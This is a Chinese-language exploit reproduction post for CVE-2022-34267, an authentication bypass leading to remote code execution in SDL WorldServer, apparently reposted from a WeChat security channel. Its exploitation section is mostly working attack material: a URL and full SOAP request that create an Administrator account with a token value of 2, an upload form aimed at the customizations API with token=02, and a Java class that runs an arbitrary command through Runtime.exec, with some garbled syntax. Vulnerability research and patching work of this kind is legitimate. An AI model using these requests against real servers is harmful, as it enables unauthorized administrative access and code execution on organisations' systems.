本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
SDL WorldServer 翻译流程管理系统专为本地化项目经理及其团队而设计,用于集中管理、自动化和控制大量的翻译项目,以提供按时、按预算的高质量翻译交付。企业团队可在整个组织内重新获得翻译控制权,并可与多个外部翻译供应商(LSP)高效协作。目前支持许多全球知名品牌的翻译流程,成功简化并加快了其内容从网站到文档到软件的本地化流程。
开发语言:Java
官网地址:https:
//www.rws.com/cn/
空间测绘
回复“CVE-2022-34267”获取空间测绘语句
漏洞描述
在 11.7.3 之前的 RWS WorldServer 中发现了一个问题。添加值为 02 的令牌参数会绕过所有身份验证要求。任意 Java 代码可以通过 .jar 存档上传到 ws-api/v2/customizations/api 端点并执行。
影响版本
SDL
WorldServer
≤ 11
.7
.2
.243
漏洞利用
一、添加管理员用户
/ws-legacy/services/UserWSUserManager?method=createUser_&username=testuser&password=testuser@qaz123&firstName=luis&lastName=ladon&userType=Administrator&token=
2
或者
POST
/ws-legacy/services/UserWSUserManager
HTTP/1.1
Host
: localhost:8080
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5763.212 Safari/537.36 OPR/98.0.4728.119
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
: JSESSIONID=A440950C0CE03EBC83A30F926F0FC3E3
Connection
: close
SOAPAction
:
Content-Type: text/xml;charset=UTF-8
Content-Length
: 856
<
soapenv:Envelope
xmlns:xsi
=
"http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd
=
"http://www.w3.org/2001/XMLSchema"
xmlns:soapenv
=
"http://schemas.xmlsoap.org/soap/envelope/"
xmlns:com
=
"http://www.idiominc.org/com.idiominc.webservices.UserWSUserManager"
>
<
soapenv:Header
/>
<
soapenv:Body
>
<
com:createUser_
soapenv:encodingStyle
=
"http://schemas.xmlsoap.org/soap/encoding/"
>
<
token
xsi:type
=
"xsd:string"
>
2
</
token
>
<
username
xsi:type
=
"xsd:string"
>
testuser
</
username
>
<
password
xsi:type
=
"xsd:string"
>
testuser@qaz123
</
password
>
<
firstName
xsi:type
=
"xsd:string"
>
luis
</
firstName
>
<
lastName
xsi:type
=
"xsd:string"
>
ladon
</
lastName
>
<
userType
xsi:type
=
"xsd:string"
>
Administrator
</
userType
>
</
com:createUser_
>
</
soapenv:Body
>
</
soapenv:Envelope
>
二、上传jar文件执行命令
上传表单
</
!DOCTYPE
html
>
<
html
>
<
head
>
<
title
>
file upload
</
title
>
</
head
>
<
body
>
<
h2
>
hello
</
h2
>
<
form
action
=
"http://xxx.xxx.xxx/ws-api/v2/customizations/api?token=02"
method
=
"post"
enctype
=
"multipart/form-data"
>
<
input
type
=
"file"
name
=
"file"
/>
<
input
type
=
"submit"
value
=
"Submit"
/>
</
form
>
</
body
>
</
html
>
POC
package
com.sdl.lt.worldserver.customizations.newextension;
import
java.io.IOException;
import
com.idiominc.wssdk.WSContext;
import
org.springframework.web.bind.
annotation
.ResponseBody;
import
org.springframework.web.bind.
annotation
.RequestParam;
import
org.springframework.web.bind.
annotation
.RequestMapping;
import
org.springframework.beans.factory.
annotation
.Autowired;
import
org.springframework.web.bind.
annotation
.RestController;
import
org.springframework.web.bind.
annotation
.RequestMethod;
(
"/extensions/test"
)
public
class
NewExtension
{
private
WSContext context;
(value =
"/clients"
, method = {RequestMethod.GET})
public
String test() throws Exception {
try
{
Process p = Runtime.getRuntime)(.exec(
"INSERT COMMAND HERE"
);
}
catch
(IOException exception){
return
"false"
;
}
return
"PoC - Remote Code Execution"
;
}
}
参考链接
https:
/
/nvd.nist.gov/vuln
/detail/
CVE-
2022
-
34267
https:
/
/www.triskelelabs.com/vulnerabilities
-
in
-rws-worldserver
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2022-34267 SDL WorldServer 身份认证绕过RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论